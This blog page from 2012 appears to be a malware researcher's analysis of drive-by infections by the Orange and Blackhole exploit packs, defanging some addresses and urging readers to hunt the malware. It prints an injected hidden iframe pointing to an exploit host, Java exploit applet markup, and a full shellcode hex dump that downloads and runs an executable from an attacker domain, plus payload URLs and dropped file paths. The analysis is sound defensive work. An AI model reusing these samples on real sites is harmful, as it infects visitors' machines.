RSS Feed
Twitter
If you see the infected page with this code:
Don't be surprised for being undetected:
This is the orange exploit pack infector HTML analyzed in ---->>> [ H E R E ]
This is featured post 1 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 2 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 3 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
Thứ Năm, 30 tháng 8, 2012
02:08
nam tóc xù
It is an infected HTML with the orange exploit pack.
I am following the @kafeine report of it.
I am following the @kafeine report of it.
Source: hxxp://breitlingline.biz/
With the infector HTML/IFrame
<iframe src="hxxp://petrol.thehickorymotormile.com:8382/AZAgQw?wITGN=78" width=0 height=0 frameborder=0></iframe>
The VT detection is very low = 1/41
Java exploit of CVE-2008-5353 and CVE-2012-0507 was detected at the iframe redirected url. Giving you malicious applet like:
<html><head></head>
<body>
<applet archive="24" code="WCfn.class" width="8" height="7"><param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"><param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"></applet>
<p>HKKatmqLjj</p><br>
<embed src="255" width="518" height="364">
</body>
<body>
<applet archive="24" code="WCfn.class" width="8" height="7"><param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"><param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"></applet>
<p>HKKatmqLjj</p><br>
<embed src="255" width="518" height="364">
</body>
With taking you to the execution of the below shellcodes:
4c 20 60 0f a5 63 80 4a 3c 20 60 0f 96 21 80 4a 90 1f 80 4a 30
90 84 4a 7d 7e 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 71 88 80 4a 64 20 60 0f 00 04 00 00 41 41 41
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58
8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30
20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58
8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74 74 70 3a 2f 2f 64
69 65 73 65 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f 72
6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f
65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff
And your PC will be downloaded by:
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=% (and)
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5
first & second download is going to be the same payload malware:
0318c42a3f.exe 059b029e9f645bafde2d603b73221f19
Which Will drop:
C:\Documents and Settings\Administrator\Application Data\Apynf
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql
OR
C:\Documents and Settings\Administrator\Application Data\Xuhika
C:\Documents and Settings\Administrator\Application Data\Xuhika\kaby.zio
C:\Documents and Settings\Administrator\Application Data\Ydywba
C:\Documents and Settings\Administrator\Application Data\Ydywba\kifag.exe
C:\Documents and Settings\Administrator\Application Data\Ytwy
C:\Documents and Settings\Administrator\Application Data\Ytwy\cuakr.abp
Those binaries makes these rigistry key:
HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Ocduge
with new value:
HKU\..\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
term= AppData
To-=C:\Documents and Settings\Administrator\Application Data <-- malware executable homebasedir
term= AppData
To-=C:\Documents and Settings\Administrator\Application Data <-- malware executable homebasedir
00:33
nam tóc xù
It is an epidemic of blackhole infection url in the wild.
Below are the analysis of the dropped malwares so far:
Below are the analysis of the dropped malwares so far:
6d84a5f24fe9c0f88a379ab0b6890cc59b76f2f1df7d1743a3e03a1786a57fe2e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206b87663fee7295c30d97b399ebbbea644c20e3f49778dfd8cc706574fceff7642
Hunting #Tips!
Below are the similarities of the current epidemic:
1. New obfuscation like below 
2. Shellcode API of kernel.dll and urmon.dll was used to download, save, execute and daemonize the payload trojan
, like: 
3. Payload is packed by newest method to aboid packerDB detection
4. infected urls can be grepped by: ".php?f=" ".php?h=" by almost all MDL
5. This is the popular malware downloader used by current epidemic:
Thứ Tư, 29 tháng 8, 2012
20:34
nam tóc xù
I came up with this sample today from MDL, I analyzed it and wrote report in VT with the below URL: https://www.virustotal.com/file/bb95e70c6ea8aaf8134bf9c9645aef715e4b4806004afbcfa9cd572b44939d82/analysis/1346296410/
My comment:
It is a new infection injected code, kinda long, but malzilla and jsunpack break them after 3loop in tries. It was uploaded by 2012 Aug30th 11:30 in the infected server. Very new. No wonder VT has the Detection Ratio of (2/42)
It redirected you to the infected payload using the Java exploit
The payload detection ratio is 11/42 and can be viewed here:
https://www.virustotal.com/file/e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206/analysis/
You can grab the sample directly from the infection source, still up/alive. 
Or contact me for more details.
#MalwareMustDie!
11:39
nam tóc xù
Just found this anonymous article posted in the pastebin which explained "How to stop Blackhole Exploit Kit by using its vulnerability".
So many blackhole server came up in to serve malwares at the same time. The article is explaining the weaknesses of the security configuration of ngnix used by these blackholes by possibility exploiting its redirection features of it to perform a loop to gain DoS to its service.
Thứ Ba, 28 tháng 8, 2012
11:39
nam tóc xù
We have a very postive response from researchers after releasing the twitter forum of #MalwareMustDie, Thank's to the reversers and analysists friends who spontaneously join & actively involve and those also who monitored the stream. it was the busiest 6hours of my life.
From appearance you may see stuffs like this: 
Like you can see in the widget at the right panel of this blog..
In actual the admin panel went so crazy like this snips: 
which is rolling fast for mentions & follows. Boy, we're into something!
It is a good start indeed let's make a go for it, a good 6 hours of first response!!
Thank you guys, you're all great and let's stay in touch. Because I am compiling some honeypot reports for tomorrow & trying to build cases. Without leads we will work fast like today cracking & yelling crazy in chaos.
That's the spirit boys! And we really think #MalwareMUSTdie!!
Thứ Sáu, 24 tháng 8, 2012
09:50
nam tóc xù
I am happy to report, Ammyy, the remote software firm, are now warning about the on-going telephony scams.
When a support scammer tries to get you to hand over your credit card details in exchange for a fraudulent virus removal and system protection ‘service’, an important part of the scam involves persuading you to give them remote access to your system. They do this partly to convince you that
When a support scammer tries to get you to hand over your credit card details in exchange for a fraudulent virus removal and system protection ‘service’, an important part of the scam involves persuading you to give them remote access to your system. They do this partly to convince you that
Đăng ký:
Bài đăng (Atom)
